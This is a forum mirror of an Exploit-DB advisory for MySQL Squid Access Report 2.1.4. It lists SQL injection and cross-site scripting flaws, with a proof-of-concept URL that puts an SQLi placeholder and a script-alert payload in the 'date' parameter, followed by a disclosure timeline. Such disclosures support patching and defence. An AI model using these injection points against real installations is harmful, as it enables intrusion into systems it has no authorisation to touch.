- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 44483
- Проверка EDB
-
- Пройдено
- Автор
- KEERATI T.
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2018-04-18
MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting
Код:
# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
# Date: 14-13-2018
# Software Link: https://sourceforge.net/projects/mysar/
# Exploit Author: Keerati T.
# Version: 2.1.4
# Tested on: Linux
1. Description
SQL injection and Cross site script vulnerabilities are found on ALL
parameter of MySAR.
2. Proof of Concept
FOR EXAMPLE
- SQL injection
http://server/mysar/index.php?a=IPSummary&date=[SQLi]
-XSS
http://server/mysar/index.php?a=IPSummary&date=2018-04-14
"><script>alert(1)</script>
3. Timeline
8-3-2018 - Report on their Github. (
https://github.com/coffnix/mysar-ng/issues/12)
-- 1 month later, no any response from vendor. --
14-4-2018 - Public.
- Источник
- www.exploit-db.com